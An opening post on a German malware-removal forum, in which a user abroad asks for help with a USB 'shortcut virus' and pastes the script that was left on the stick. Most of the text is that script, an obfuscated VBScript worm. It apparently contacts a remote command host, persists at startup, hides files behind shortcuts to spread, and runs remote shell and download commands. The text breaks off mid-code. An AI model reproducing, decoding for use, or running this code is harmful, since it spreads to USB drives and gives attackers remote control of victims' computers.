| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: Flash Drive Shortcut Virus wtbchkxbde..vbsWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
 |
11.04.2014, 23:50
| #1 |
 |  Flash Drive Shortcut Virus wtbchkxbde..vbs Hallo Trojaner-Board Ich bin gerade auf Praxissemester im Regenwald von Papua Neuguinea und habe hier sehr schlechtes aber trotzdem ziemlich teures Internet. Ich bitte also um Verständnis dass ich nicht im Voraus irgendwelche Programme heruntergeladen und Logfiles erstellt habe, werde dies aber machen wenn ihr es für nötig haltet, ich würde aber darum bitten immer an die Bandbreite-schonendste Möglichkeit zu denken und mir evtl einen Link dazu zu posten, jedes Kilobyte ist bares Geld  Falls es die Lösung für mein Problem hier schon irgendwo gibt wäre ein kurzer Hinweis nett. Ich benutze Windows 7 64 bit auf einem Acer Aspire Laptop Habe einem Dorfbewohner hier meinen USB-Stick gegeben und dann ohne nachzudenken darauf zugegriffen. Alle Dateien wurden versteckt und durch Verknüpfungen ersetzt. Außerdem befindet sich eine Datei namens "wtbchkxbde..vbs" auf dem Stick, Erstelldatum 22.9.13, Größe 72 kB (wobei auf dem Stick nach dem Formatieren 90 mB belegt sind, keine Ahnung ob das normal ist) Die .vbs enthält folgenden Text: Code:
ATTFilter mfvasRGZIhZnddvphsOW="112$@133$@164$@105$@187$@174$@172$@184$@173$@174$@187$@105$@131$@105$@177$@184$@190$@173$@178$@183$@178$@105$@113$@172$@114$@105$@188$@180$@194$@185$@174$@105$@131$@105$@177$@184$@190$@173$@178$@183$@178$@118$@175$@193$@105$@166$@135$@86$@83$@86$@83$@112$@134$@118$@134$@118$@134$@118$@134$@118$@134$@105$@172$@184$@183$@175$@178$@176$@105$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@86$@83$@86$@83$@177$@184$@188$@189$@105$@134$@105$@107$@171$@187$@184$@192$@188$@174$@187$@185$@187$@184$@189$@174$@172$@189$@119$@177$@184$@185$@189$@184$@119$@184$@187$@176$@107$@86$@83$@185$@184$@187$@189$@105$@134$@105$@129$@123$@127$@129$@86$@83$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@134$@105$@107$@110$@170$@185$@185$@173$@170$@189$@170$@110$@107$@86$@83$@181$@183$@180$@175$@178$@181$@174$@105$@134$@105$@189$@187$@190$@174$@86$@83$@181$@183$@180$@175$@184$@181$@173$@174$@187$@105$@134$@105$@189$@187$@190$@174$@86$@83$@86$@83$@112$@134$@118$@134$@118$@134$@118$@134$@118$@134$@105$@185$@190$@171$@181$@178$@172$@105$@191$@170$@187$@105$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@86$@83$@86$@83$@173$@178$@182$@105$@188$@177$@174$@181$@181$@184$@171$@179$@105$@86$@83$@188$@174$@189$@105$@188$@177$@174$@181$@181$@184$@171$@179$@105$@134$@105$@192$@188$@172$@187$@178$@185$@189$@119$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@192$@188$@172$@187$@178$@185$@189$@119$@188$@177$@174$@181$@181$@107$@114$@86$@83$@173$@178$@182$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@86$@83$@188$@174$@189$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@188$@172$@187$@178$@185$@189$@178$@183$@176$@119$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@174$@172$@189$@107$@114$@86$@83$@173$@178$@182$@105$@177$@189$@189$@185$@184$@171$@179$@86$@83$@188$@174$@189$@105$@177$@189$@189$@185$@184$@171$@179$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@114$@86$@83$@86$@83$@86$@83$@112$@134$@118$@134$@118$@134$@118$@134$@118$@134$@105$@185$@187$@178$@191$@170$@189$@105$@191$@170$@187$@105$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@86$@83$@86$@83$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@134$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@183$@170$@182$@174$@86$@83$@188$@189$@170$@187$@189$@190$@185$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@188$@185$@174$@172$@178$@170$@181$@175$@184$@181$@173$@174$@187$@188$@105$@113$@107$@188$@189$@170$@187$@189$@190$@185$@107$@114$@105$@111$@105$@107$@165$@107$@86$@83$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@185$@170$@183$@173$@174$@183$@191$@178$@187$@184$@183$@182$@174$@183$@189$@188$@189$@187$@178$@183$@176$@188$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@114$@105$@111$@105$@107$@165$@107$@86$@83$@178$@175$@105$@183$@184$@189$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@175$@184$@181$@173$@174$@187$@174$@193$@178$@188$@189$@188$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@114$@105$@189$@177$@174$@183$@105$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@185$@170$@183$@173$@174$@183$@191$@178$@187$@184$@183$@182$@174$@183$@189$@188$@189$@187$@178$@183$@176$@188$@113$@107$@110$@189$@174$@182$@185$@110$@107$@114$@105$@111$@105$@107$@165$@107$@86$@83$@188$@185$@181$@178$@189$@174$@187$@105$@134$@105$@107$@133$@107$@105$@111$@105$@107$@197$@107$@105$@111$@105$@107$@135$@107$@86$@83$@188$@181$@174$@174$@185$@105$@134$@105$@126$@121$@121$@121$@105$@86$@83$@173$@178$@182$@105$@187$@174$@188$@185$@184$@183$@188$@174$@86$@83$@173$@178$@182$@105$@172$@182$@173$@86$@83$@173$@178$@182$@105$@185$@170$@187$@170$@182$@86$@83$@178$@183$@175$@184$@105$@134$@105$@107$@107$@86$@83$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@107$@86$@83$@188$@189$@170$@187$@189$@173$@170$@189$@174$@105$@134$@105$@107$@107$@86$@83$@173$@178$@182$@105$@184$@183$@174$@184$@183$@172$@174$@86$@83$@86$@83$@112$@134$@118$@134$@118$@134$@118$@134$@118$@134$@105$@172$@184$@173$@174$@105$@188$@189$@170$@187$@189$@105$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@86$@83$@178$@183$@188$@189$@170$@183$@172$@174$@86$@83$@192$@177$@178$@181$@174$@105$@189$@187$@190$@174$@86$@83$@86$@83$@178$@183$@188$@189$@170$@181$@181$@86$@83$@86$@83$@187$@174$@188$@185$@184$@183$@188$@174$@105$@134$@105$@107$@107$@86$@83$@187$@174$@188$@185$@184$@183$@188$@174$@105$@134$@105$@185$@184$@188$@189$@105$@113$@107$@178$@188$@118$@187$@174$@170$@173$@194$@107$@117$@107$@107$@114$@86$@83$@172$@182$@173$@105$@134$@105$@188$@185$@181$@178$@189$@105$@113$@187$@174$@188$@185$@184$@183$@188$@174$@117$@188$@185$@181$@178$@189$@174$@187$@114$@86$@83$@188$@174$@181$@174$@172$@189$@105$@172$@170$@188$@174$@105$@172$@182$@173$@105$@113$@121$@114$@86$@83$@172$@170$@188$@174$@105$@107$@174$@193$@172$@174$@172$@190$@189$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@174$@193$@174$@172$@190$@189$@174$@105$@185$@170$@187$@170$@182$@86$@83$@172$@170$@188$@174$@105$@107$@190$@185$@173$@170$@189$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@184$@183$@174$@184$@183$@172$@174$@119$@172$@181$@184$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@188$@174$@189$@105$@184$@183$@174$@184$@183$@172$@174$@105$@134$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@184$@185$@174$@183$@189$@174$@193$@189$@175$@178$@181$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@117$@123$@117$@105$@175$@170$@181$@188$@174$@114$@86$@83$@105$@105$@105$@105$@105$@105$@184$@183$@174$@184$@183$@172$@174$@119$@192$@187$@178$@189$@174$@105$@185$@170$@187$@170$@182$@86$@83$@105$@105$@105$@105$@105$@105$@184$@183$@174$@184$@183$@172$@174$@119$@172$@181$@184$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@111$@105$@172$@177$@187$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@172$@177$@187$@113$@124$@125$@114$@86$@83$@105$@105$@105$@105$@105$@105$@192$@188$@172$@187$@178$@185$@189$@119$@186$@190$@178$@189$@105$@86$@83$@172$@170$@188$@174$@105$@107$@190$@183$@178$@183$@188$@189$@170$@181$@181$@107$@86$@83$@105$@105$@105$@105$@105$@105$@190$@183$@178$@183$@188$@189$@170$@181$@181$@86$@83$@172$@170$@188$@174$@105$@107$@188$@174$@183$@173$@107$@86$@83$@105$@105$@105$@105$@105$@105$@173$@184$@192$@183$@181$@184$@170$@173$@105$@172$@182$@173$@105$@113$@122$@114$@117$@172$@182$@173$@105$@113$@123$@114$@86$@83$@172$@170$@188$@174$@105$@107$@188$@178$@189$@174$@118$@188$@174$@183$@173$@107$@86$@83$@105$@105$@105$@105$@105$@105$@188$@178$@189$@174$@173$@184$@192$@183$@181$@184$@170$@173$@174$@187$@105$@172$@182$@173$@105$@113$@122$@114$@117$@172$@182$@173$@105$@113$@123$@114$@86$@83$@172$@170$@188$@174$@105$@107$@187$@174$@172$@191$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@190$@185$@181$@184$@170$@173$@105$@113$@185$@170$@187$@170$@182$@114$@86$@83$@172$@170$@188$@174$@105$@105$@107$@174$@183$@190$@182$@118$@173$@187$@178$@191$@174$@187$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@184$@188$@189$@105$@107$@178$@188$@118$@174$@183$@190$@182$@118$@173$@187$@178$@191$@174$@187$@107$@117$@174$@183$@190$@182$@173$@187$@178$@191$@174$@187$@105$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@174$@183$@190$@182$@118$@175$@170$@175$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@185$@184$@188$@189$@105$@107$@178$@188$@118$@174$@183$@190$@182$@118$@175$@170$@175$@107$@117$@174$@183$@190$@182$@175$@170$@175$@105$@113$@185$@170$@187$@170$@182$@114$@86$@83$@172$@170$@188$@174$@105$@105$@107$@174$@183$@190$@182$@118$@185$@187$@184$@172$@174$@188$@188$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@184$@188$@189$@105$@107$@178$@188$@118$@174$@183$@190$@182$@118$@185$@187$@184$@172$@174$@188$@188$@107$@117$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@105$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@172$@182$@173$@118$@188$@177$@174$@181$@181$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@185$@184$@188$@189$@105$@107$@178$@188$@118$@172$@182$@173$@118$@188$@177$@174$@181$@181$@107$@117$@172$@182$@173$@188$@177$@174$@181$@181$@105$@113$@185$@170$@187$@170$@182$@114$@105$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@173$@174$@181$@174$@189$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@173$@174$@181$@174$@189$@174$@175$@170$@175$@105$@113$@185$@170$@187$@170$@182$@114$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@174$@193$@178$@189$@118$@185$@187$@184$@172$@174$@188$@188$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@174$@193$@178$@189$@185$@187$@184$@172$@174$@188$@188$@105$@113$@185$@170$@187$@170$@182$@114$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@188$@181$@174$@174$@185$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@188$@181$@174$@174$@185$@105$@134$@105$@174$@191$@170$@181$@105$@113$@185$@170$@187$@170$@182$@114$@105$@105$@105$@105$@105$@105$@105$@105$@86$@83$@174$@183$@173$@105$@188$@174$@181$@174$@172$@189$@86$@83$@86$@83$@192$@188$@172$@187$@178$@185$@189$@119$@188$@181$@174$@174$@185$@105$@188$@181$@174$@174$@185$@86$@83$@86$@83$@192$@174$@183$@173$@86$@83$@86$@83$@86$@83$@188$@190$@171$@105$@178$@183$@188$@189$@170$@181$@181$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@173$@178$@182$@105$@181$@183$@180$@184$@171$@179$@86$@83$@173$@178$@182$@105$@175$@178$@181$@174$@183$@170$@182$@174$@86$@83$@173$@178$@182$@105$@175$@184$@181$@173$@174$@187$@183$@170$@182$@174$@86$@83$@173$@178$@182$@105$@175$@178$@181$@174$@178$@172$@184$@183$@86$@83$@173$@178$@182$@105$@175$@184$@181$@173$@174$@187$@178$@172$@184$@183$@86$@83$@86$@83$@190$@185$@188$@189$@170$@187$@189$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@173$@187$@178$@191$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@187$@178$@191$@174$@188$@86$@83$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@178$@188$@187$@174$@170$@173$@194$@105$@134$@105$@189$@187$@190$@174$@105$@189$@177$@174$@183$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@175$@187$@174$@174$@188$@185$@170$@172$@174$@105$@105$@135$@105$@121$@105$@189$@177$@174$@183$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@173$@187$@178$@191$@174$@189$@194$@185$@174$@105$@105$@134$@105$@122$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@172$@184$@185$@194$@175$@178$@181$@174$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@105$@117$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@189$@187$@190$@174$@86$@83$@105$@105$@105$@105$@178$@175$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@105$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@178$@181$@174$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@123$@116$@125$@86$@83$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@175$@184$@187$@105$@174$@170$@172$@177$@105$@175$@178$@181$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@113$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@114$@119$@143$@178$@181$@174$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@183$@184$@189$@105$@181$@183$@180$@175$@178$@181$@174$@105$@189$@177$@174$@183$@105$@174$@193$@178$@189$@105$@175$@184$@187$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@178$@183$@188$@189$@187$@105$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@119$@107$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@181$@172$@170$@188$@174$@105$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@105$@113$@190$@171$@184$@190$@183$@173$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@114$@114$@114$@105$@133$@135$@105$@107$@181$@183$@180$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@123$@116$@125$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@190$@172$@170$@188$@174$@105$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@114$@105$@133$@135$@105$@190$@172$@170$@188$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@183$@170$@182$@174$@105$@134$@105$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@119$@107$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@188$@174$@189$@105$@181$@183$@180$@184$@171$@179$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@172$@187$@174$@170$@189$@174$@188$@177$@184$@187$@189$@172$@190$@189$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@105$@111$@105$@175$@178$@181$@174$@183$@170$@182$@174$@105$@113$@121$@114$@105$@111$@105$@107$@119$@181$@183$@180$@107$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@192$@178$@183$@173$@184$@192$@188$@189$@194$@181$@174$@105$@134$@105$@128$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@189$@170$@187$@176$@174$@189$@185$@170$@189$@177$@105$@134$@105$@107$@172$@182$@173$@119$@174$@193$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@192$@184$@187$@180$@178$@183$@176$@173$@178$@187$@174$@172$@189$@184$@187$@194$@105$@134$@105$@107$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@170$@187$@176$@190$@182$@174$@183$@189$@188$@105$@134$@105$@107$@120$@172$@105$@188$@189$@170$@187$@189$@105$@107$@105$@111$@105$@187$@174$@185$@181$@170$@172$@174$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@105$@107$@117$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@107$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@114$@105$@111$@105$@107$@111$@188$@189$@170$@187$@189$@105$@107$@105$@111$@105$@187$@174$@185$@181$@170$@172$@174$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@105$@107$@117$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@107$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@114$@105$@111$@107$@111$@174$@193$@178$@189$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@178$@172$@184$@183$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@187$@174$@170$@173$@105$@113$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@172$@181$@170$@188$@188$@174$@188$@165$@107$@105$@111$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@187$@174$@170$@173$@105$@113$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@172$@181$@170$@188$@188$@174$@188$@165$@119$@107$@105$@111$@105$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@113$@190$@171$@184$@190$@183$@173$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@114$@114$@111$@105$@107$@165$@107$@114$@105$@111$@105$@107$@165$@173$@174$@175$@170$@190$@181$@189$@178$@172$@184$@183$@165$@107$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@178$@183$@188$@189$@187$@105$@113$@175$@178$@181$@174$@178$@172$@184$@183$@117$@107$@117$@107$@114$@105$@134$@105$@121$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@178$@172$@184$@183$@181$@184$@172$@170$@189$@178$@184$@183$@105$@134$@105$@175$@178$@181$@174$@119$@185$@170$@189$@177$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@181$@188$@174$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@178$@172$@184$@183$@181$@184$@172$@170$@189$@178$@184$@183$@105$@134$@105$@175$@178$@181$@174$@178$@172$@184$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@188$@170$@191$@174$@113$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@105$@105$@105$@105$@175$@184$@187$@105$@174$@170$@172$@177$@105$@175$@184$@181$@173$@174$@187$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@113$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@114$@119$@188$@190$@171$@175$@184$@181$@173$@174$@187$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@183$@184$@189$@105$@181$@183$@180$@175$@184$@181$@173$@174$@187$@105$@189$@177$@174$@183$@105$@174$@193$@178$@189$@105$@175$@184$@187$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@175$@184$@181$@173$@174$@187$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@123$@116$@125$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@175$@184$@181$@173$@174$@187$@183$@170$@182$@174$@105$@134$@105$@175$@184$@181$@173$@174$@187$@119$@183$@170$@182$@174$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@188$@174$@189$@105$@181$@183$@180$@184$@171$@179$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@172$@187$@174$@170$@189$@174$@188$@177$@184$@187$@189$@172$@190$@189$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@105$@111$@105$@175$@184$@181$@173$@174$@187$@183$@170$@182$@174$@105$@111$@105$@107$@119$@181$@183$@180$@107$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@192$@178$@183$@173$@184$@192$@188$@189$@194$@181$@174$@105$@134$@105$@128$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@189$@170$@187$@176$@174$@189$@185$@170$@189$@177$@105$@134$@105$@107$@172$@182$@173$@119$@174$@193$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@192$@184$@187$@180$@178$@183$@176$@173$@178$@187$@174$@172$@189$@184$@187$@194$@105$@134$@105$@107$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@170$@187$@176$@190$@182$@174$@183$@189$@188$@105$@134$@105$@107$@120$@172$@105$@188$@189$@170$@187$@189$@105$@107$@105$@111$@105$@187$@174$@185$@181$@170$@172$@174$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@105$@107$@117$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@107$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@114$@105$@111$@105$@107$@111$@188$@189$@170$@187$@189$@105$@174$@193$@185$@181$@184$@187$@174$@187$@105$@107$@105$@111$@105$@187$@174$@185$@181$@170$@172$@174$@113$@175$@184$@181$@173$@174$@187$@119$@183$@170$@182$@174$@117$@107$@105$@107$@117$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@107$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@114$@105$@111$@107$@111$@174$@193$@178$@189$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@